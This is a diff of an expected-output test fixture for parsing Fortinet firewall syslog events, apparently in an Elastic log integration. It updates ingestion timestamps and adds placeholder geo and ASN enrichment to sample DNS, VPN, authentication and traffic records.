 "original": "\u003c189\u003edate=2020-04-23 time=12:17:04 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230224712900694 tz=\"-0500\" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=2352 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=93 catdesc=\"Remote Access\"",
 "code": "1501054802",
 "timezone": "-0500",
@@ -901,6 +1009,18 @@
 "level": "information"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 53,
 "ip": "67.43.156.13"
 },
@@ -968,7 +1088,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357794Z",
+ "ingested": "2021-12-14T14:43:01.495910800Z",
 "original": "\u003c190\u003edate=2020-04-23 time=12:17:12 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1500054000\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-query\" level=\"information\" vd=\"root\" eventtime=1587230232658642672 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=235 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\"",
 "code": "1500054000",
 "timezone": "-0500",
@@ -988,6 +1108,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.13"
 },
@@ -1056,7 +1188,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357800Z",
+ "ingested": "2021-12-14T14:43:01.495911186Z",
 "original": "\u003c189\u003edate=2020-04-23 time=13:15:18 devname=\"testswitch2\" devid=\"someotherid\" logid=\"1700062001\" type=\"utm\" subtype=\"ssl\" eventtype=\"ssl-anomalies\" level=\"notice\" vd=\"root\" eventtime=1587230118838592454 tz=\"-0400\" policyid=12 sessionid=42346234 service=\"HTTPS\" user=\"elasticuser2\" group=\"elasticgroup2\" profile=\"somecerts\" srcip=192.168.2.1 srcport=59726 dstip=67.43.156.13 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 action=\"passthrough\" msg=\"Server certificate passed\" reason=\"untrusted-cert\"",
 "code": "1700062001",
 "timezone": "-0400",
@@ -1118,7 +1250,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357806500Z",
+ "ingested": "2021-12-14T14:43:01.495911978Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:32:48 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043014\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587231168439640874 tz=\"-0500\" logdesc=\"FSSO logon authentication status\" srcip=10.10.10.10 user=\"elasticouser\" server=\"elasticserver\" action=\"FSSO-logon\" msg=\"FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10\"",
 "code": "0102043014",
 "timezone": "-0500",
@@ -1139,6 +1271,18 @@
 "level": "error"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 500,
 "ip": "67.43.156.13"
 },
@@ -1146,6 +1290,18 @@
 "description": "IPsec phase 1 error"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 500,
 "ip": "67.43.156.13"
 },
@@ -1183,7 +1339,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357812600Z",
+ "ingested": "2021-12-14T14:43:01.495912361Z",
 "original": "\u003c187\u003edate=2020-04-23 time=12:32:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037124\" type=\"event\" subtype=\"vpn\" level=\"error\" vd=\"root\" eventtime=1587231168339114138 tz=\"-0500\" logdesc=\"IPsec phase 1 error\" msg=\"IPsec phase 1 error\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf=\"wan2\" cookies=\"345hkjhdrs87/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"N/A\" status=\"negotiate_error\" reason=\"peer SA proposal not match local policy\" peer_notif=\"NOT-APPLICABLE\"",
 "code": "0101037124",
 "timezone": "-0500",
@@ -1203,6 +1359,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 500,
 "ip": "67.43.156.13"
 },
@@ -1210,6 +1378,18 @@
 "description": "Progress IPsec phase 1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 500,
 "ip": "67.43.156.13"
 },
@@ -1254,7 +1434,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357818800Z",
+ "ingested": "2021-12-14T14:43:01.495912758Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:32:31 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231151628960857 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf=\"wan1\" cookies=\"df868dsg876d/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"elasticvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"",
 "code": "0101037127",
 "timezone": "-0500",
@@ -1305,9 +1485,8 @@
 "rule": {
 "description": "System performance statistics"
 },
- "message": "Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0",
 "event": {
- "ingested": "2021-12-09T13:37:22.357824800Z",
+ "ingested": "2021-12-14T14:43:01.495913162Z",
 "original": "\u003c189\u003edate=2020-04-23 time=14:32:09 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100040704\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587231129938795255 tz=\"-0300\" logdesc=\"System performance statistics\" action=\"perf-stats\" cpu=0 mem=10 totalsession=23 disk=0 bandwidth=\"23/4\" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg=\"Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0\"",
 "code": "0100040704",
 "timezone": "-0300",
@@ -1320,6 +1499,7 @@
 "host"
 ]
 },
+ "message": "Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0",
 "tags": [
 "preserve_original_event"
 ]
@@ -1371,7 +1551,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357830900Z",
+ "ingested": "2021-12-14T14:43:01.495913543Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:32:09 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043039\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587231130109462858 tz=\"-0500\" logdesc=\"Authentication logon\" srcip=10.10.10.10 user=\"elastiiiuser\" authserver=\"FSSO_elastiauth\" action=\"auth-logon\" status=\"logon\" msg=\"User elastiiiuser added to auth logon\"",
 "code": "0102043039",
 "timezone": "-0500",
@@ -1392,6 +1572,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 500,
 "ip": "67.43.156.13"
 },
@@ -1399,6 +1591,18 @@
 "description": "Progress IPsec phase 1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 500,
 "ip": "67.43.156.14"
 },
@@ -1444,7 +1648,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357837200Z",
+ "ingested": "2021-12-14T14:43:01.495914067Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:32:00 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231120608961118 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.14 remport=500 locport=500 outintf=\"wan1\" cookies=\"345khj34566/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"testvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"",
 "code": "0101037127",
 "timezone": "-0500",
@@ -1485,15 +1689,15 @@
 "rule": {
 "description": "FortiSandbox AV database updated"
 },
- "message": "FortiSandbox AV database updated",
 "event": {
 "start": "2020-04-18T14:24:15.301-03:00",
- "ingested": "2021-12-09T13:37:22.357843300Z",
+ "ingested": "2021-12-14T14:43:01.495914477Z",
 "original": "\u003c189\u003edate=2020-04-23 time=14:24:13 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100041006\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230655301863513 tz=\"-0300\" logdesc=\"FortiSandbox AV database updated\" version=\"1.522479\" msg=\"FortiSandbox AV database updated\"",
 "code": "0100041006",
 "timezone": "-0300",
 "kind": "event"
 },
+ "message": "FortiSandbox AV database updated",
 "tags": [
 "preserve_original_event"
 ]
@@ -1548,7 +1752,7 @@
 },
 "event": {
 "start": "2020-04-18T12:23:47.558-05:00",
- "ingested": "2021-12-09T13:37:22.357849400Z",
+ "ingested": "2021-12-14T14:43:01.495914851Z",
 "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0107045057\" type=\"event\" subtype=\"endpoint\" level=\"information\" vd=\"root\" eventtime=1587230627558979735 tz=\"-0500\" logdesc=\"FortiClient connection added\" action=\"add\" status=\"success\" license_limit=\"unlimited\" used_for_type=3 connection_type=\"sslvpn\" count=2 user=\"elastico\" ip=172.16.0.2 name=\"somerouter\" fctuid=\"645234fdd01F885824F764\" msg=\"Add a FortiClient Connection.\"",
 "code": "0107045057",
 "timezone": "-0500",
@@ -1560,6 +1764,18 @@
 "level": "information"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "ip": "67.43.156.13"
 },
 "rule": {
@@ -1596,7 +1812,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357885900Z",
+ "ingested": "2021-12-14T14:43:01.495915232Z",
 "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039943\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627334405765 tz=\"-0500\" logdesc=\"SSL VPN new connection\" action=\"ssl-new-con\" tunneltype=\"ssl\" tunnelid=2 remip=67.43.156.13 user=\"N/A\" group=\"N/A\" dst_host=\"N/A\" reason=\"N/A\" msg=\"SSL new connection\"",
 "code": "0101039943",
 "timezone": "-0500",
@@ -1615,6 +1831,18 @@
 "level": "information"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "ip": "67.43.156.13"
 },
 "rule": {
@@ -1664,7 +1892,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357893800Z",
+ "ingested": "2021-12-14T14:43:01.495915643Z",
 "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039947\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627698970007 tz=\"-0500\" logdesc=\"SSL VPN tunnel up\" action=\"tunnel-up\" tunneltype=\"ssl-tunnel\" tunnelid=2345 remip=67.43.156.13 tunnelip=10.10.10.10 user=\"someuser\" group=\"somegroup\" dst_host=\"N/A\" reason=\"tunnel established\" msg=\"SSL tunnel established\"",
 "code": "0101039947",
 "timezone": "-0500",
@@ -1724,7 +1952,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357900200Z",
+ "ingested": "2021-12-14T14:43:01.495916030Z",
 "original": "\u003c189\u003edate=2020-04-23 time=14:16:42 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043015\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587230204674924332 tz=\"-0300\" logdesc=\"FSSO log off authentication status\" srcip=192.168.1.1 user=\"elasticadmin\" server=\"FSSO_somefssoserver\" action=\"FSSO-logoff\" msg=\"FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1\"",
 "code": "0102043015",
 "timezone": "-0300",
@@ -1767,15 +1995,15 @@
 "rule": {
 "description": "FortiCloud server connected"
 },
- "message": "FortiCloud 67.43.156.13 server is connected",
 "event": {
 "start": "2020-04-18T12:16:03.121-05:00",
- "ingested": "2021-12-09T13:37:22.357905Z",
+ "ingested": "2021-12-14T14:43:01.495916417Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022915\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163121116383 tz=\"-0500\" logdesc=\"FortiCloud server connected\" server=\"67.43.156.13\" action=\"connect\" msg=\"FortiCloud 67.43.156.13 server is connected\"",
 "code": "0100022915",
 "timezone": "-0500",
 "kind": "event"
 },
+ "message": "FortiCloud 67.43.156.13 server is connected",
 "tags": [
 "preserve_original_event"
 ]
@@ -1808,15 +2036,15 @@
 "rule": {
 "description": "FortiCloud server disconnected"
 },
- "message": "FortiCloud 4.4.4.4 server is disconnected",
 "event": {
 "start": "2020-04-18T12:16:03.375-05:00",
- "ingested": "2021-12-09T13:37:22.357927100Z",
+ "ingested": "2021-12-14T14:43:01.495916914Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022913\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163375149856 tz=\"-0500\" logdesc=\"FortiCloud server disconnected\" server=\"4.4.4.4\" action=\"disconnect\" reason=\"connection reset\" msg=\"FortiCloud 4.4.4.4 server is disconnected\"",
 "code": "0100022913",
 "timezone": "-0500",
 "kind": "event"
 },
+ "message": "FortiCloud 4.4.4.4 server is disconnected",
 "tags": [
 "preserve_original_event"
 ]
@@ -1826,6 +2054,18 @@
 "level": "warning"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 53,
 "ip": "67.43.156.13"
 },
@@ -1891,7 +2131,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357931400Z",
+ "ingested": "2021-12-14T14:43:01.495917303Z",
 "original": "\u003c188\u003edate=2020-04-23 time=12:14:09 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230049761513222 tz=\"-0500\" srcip=192.168.1.6 srcport=53438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=435234 proto=17 action=\"dns\" policyid=26 policytype=\"policy\" poluuid=\"2345de-b143-52134d8-6654f-4654sdfg16f431\" policyname=\"elasticnewruleset\" service=\"DNS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=54144 crlevel=\"low\"",
 "code": "0000000011",
 "timezone": "-0500",
@@ -1914,6 +2154,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 6000,
 "bytes": 65446,
 "packets": 1045601,
@@ -1931,10 +2183,22 @@
 "port": 60964,
 "ip": "67.43.156.14"
 },
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 6000,
 "bytes": 438650,
- "packets": 723417,
- "ip": "192.168.10.10"
+ "ip": "192.168.10.10",
+ "packets": 723417
 },
 "tags": [
 "preserve_original_event"
@@ -1992,7 +2256,7 @@
 },
 "event": {
 "duration": 5462000000000,
- "ingested": "2021-12-09T13:37:22.357936400Z",
+ "ingested": "2021-12-14T14:43:01.495917690Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:11:51 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000020\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587229911390385486 tz=\"-0500\" srcip=192.168.10.10 srcport=6000 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=6000 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=4352 proto=17 action=\"accept\" policyid=3426 policytype=\"policy\" poluuid=\"1765de8-5a13-765da73fdsfa1c\" policyname=\"newruleelastic\" service=\"portname\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=67.43.156.14 transport=60964 appcat=\"unknown\" applist=\"policylist\" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728",
 "code": "0000000020",
 "timezone": "-0500",
@@ -2017,18 +2281,12 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "Denmark",
+ "country_name": "Norway",
 "location": {
 "lon": 10.0,
- "lat": 56.0
+ "lat": 62.0
 },
- "country_iso_code": "DK"
- },
- "as": {
- "number": 62121,
- "organization": {
- "name": "Christian Ebsen ApS"
- }
+ "country_iso_code": "NO"
 },
 "bytes": 20,
 "packets": 0,
@@ -2042,18 +2300,12 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "Denmark",
+ "country_name": "Norway",
 "location": {
 "lon": 10.0,
- "lat": 56.0
+ "lat": 62.0
 },
- "country_iso_code": "DK"
- },
- "as": {
- "number": 62121,
- "organization": {
- "name": "Christian Ebsen ApS"
- }
+ "country_iso_code": "NO"
 },
 "bytes": 3014,
 "packets": 4,
@@ -2110,7 +2362,7 @@
 },
 "event": {
 "duration": 42000000000,
- "ingested": "2021-12-09T13:37:22.357958800Z",
+ "ingested": "2021-12-14T14:43:01.495918076Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:11:48 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229908751434997 tz=\"-0500\" srcip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 identifier=0 srcintf=\"port1\" srcintfrole=\"lan\" dstip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=6542345 proto=58 action=\"accept\" policyid=0 policytype=\"someotherpolicy\" service=\"icmp6/1/0\" trandisp=\"noop\" app=\"icmp6/25/0\" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat=\"unscanned\"",
 "code": "0001000014",
 "timezone": "-0500",
@@ -2134,6 +2386,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "bytes": 10,
 "packets": 40,
 "ip": "67.43.156.13"
@@ -2144,6 +2408,18 @@
 "id": "0"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "bytes": 0,
 "packets": 0,
 "ip": "67.43.156.13"
@@ -2201,7 +2477,7 @@
 },
 "event": {
 "duration": 20000000000,
- "ingested": "2021-12-09T13:37:22.357964600Z",
+ "ingested": "2021-12-14T14:43:01.495918471Z",
 "original": "\u003c189\u003edate=2020-04-23 time=13:10:57 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229857509058693 tz=\"-0400\" srcip=67.43.156.13 identifier=61 srcintf=\"wan1\" srcintfrole=\"wan\" dstip=67.43.156.13 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=123 proto=1 action=\"accept\" policyid=0 policytype=\"rulepolicy\" service=\"PING\" dstcountry=\"Norway\" srccountry=\"Netherlands\" trandisp=\"noop\" app=\"PING\" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat=\"unscanned\"",
 "code": "0001000014",
 "timezone": "-0400",
@@ -2297,7 +2573,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:22.357970300Z",
+ "ingested": "2021-12-14T14:43:01.495918862Z",
 "original": "\u003c188\u003edate=2020-04-23 time=12:14:39 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230079841464445 tz=\"-0500\" srcip=192.168.1.1 srcport=62493 srcintf=\"port1\" srcintfrole=\"lan\" dstip=192.168.100.100 dstport=1235 dstintf=\"newinterface\" dstintfrole=\"undefined\" sessionid=54234 proto=17 action=\"ip-conn\" policyid=49 policytype=\"policy\" poluuid=\"654cc-b6542-53467u8-e45234-1566casd35f7836\" policyname=\"oldpolicyname\" user=\"elasticsuper\" authserver=\"FSSO_newfsso\" service=\"udp/12302\" dstcountry=\"Reserved\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=63332144 crlevel=\"low\"",
 "code": "0000000011",
 "timezone": "-0500",
@@ -2320,6 +2596,18 @@
 "level": "notice"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 442,
 "bytes": 77654,
 "packets": 70,
@@ -2337,16 +2625,28 @@
 "port": 603,
 "ip": "67.43.156.14"
 },
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 56603,
+ "bytes": 923,
+ "ip": "192.168.50.50",
 "user": {
 "name": "elasticuser",
 "group": {
 "name": "testgroup"
 }
 },
- "bytes": 923,
- "packets": 113,
- "ip": "192.168.50.50"
+ "packets": 113
 },
 "tags": [
 "preserve_original_event"
@@ -2421,7 +2721,7 @@
 },
 "event": {
 "duration": 126000000000,
- "ingested": "2021-12-09T13:37:22.357976Z",
+ "ingested": "2021-12-14T14:43:01.495919245Z",
 "original": "\u003c189\u003edate=2020-04-23 time=12:14:28 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587230069291463928 tz=\"-0500\" srcip=192.168.50.50 srcport=56603 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=442 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=2345 proto=6 action=\"close\" policyid=2365 policytype=\"policy\" poluuid=\"654644c-b064-fdgdf3425-f003-1234ghdf682e05f\" policyname=\"someoldpolicyname\" user=\"elasticuser\" group=\"testgroup\" authserver=\"FSSO_something\" service=\"HTTPS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=67.43.156.14 transport=603 appid=43540 app=\"Skype.Portals\" appcat=\"Collaboration\" apprisk=\"elevated\" applist=\"someapplist\" appact=\"detected\" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality=\"Seq_num(3), alive, selected\" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction=\"block\" countweb=1 countapp=1 crscore=5 craction=6144 crlevel=\"low\"",
 "code": "0000000013",
 "timezone": "-0500",
@@ -2445,6 +2745,18 @@
 "level": "information"
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.14"
 },
@@ -2524,7 +2836,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357981800Z", + "ingested": "2021-12-14T14:43:01.495919630Z", "original": "\u003c190\u003edate=2019-05-15 time=18:03:36 logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"app-ctrl-all\" level=\"information\" vd=\"root\" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=67.43.156.14 srcport=50798 dstport=443 srcintf=\"port10\" srcintfrole=\"lan\" dstintf=\"port9\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" direction=\"outgoing\" policyid=1 sessionid=4414 applist=\"block-social.media\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" action=\"pass\" hostname=\"www.dailymotion.com\" incidentserialno=1962906680 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"*.dailymotion.com\" scertissuer=\"DigiCert SHA2 High Assurance Server CA\"", "code": "1059028704", "kind": "event", @@ -2544,6 +2856,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 500, "ip": "67.43.156.13" }, @@ -2596,7 +2920,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357987500Z", + "ingested": "2021-12-14T14:43:01.495920015Z", "original": "\u003c190\u003edate=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type=\"event\" subtype=vpn level=notice vd=root logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=negotiate remip=67.43.156.13 locip=10.10.10.10 remport=500 locport=500 outintf=\"port1\" cookies=\"125cbf9ee8349965/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"P1_Test\" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK", "code": "0101037127", "kind": "event", 
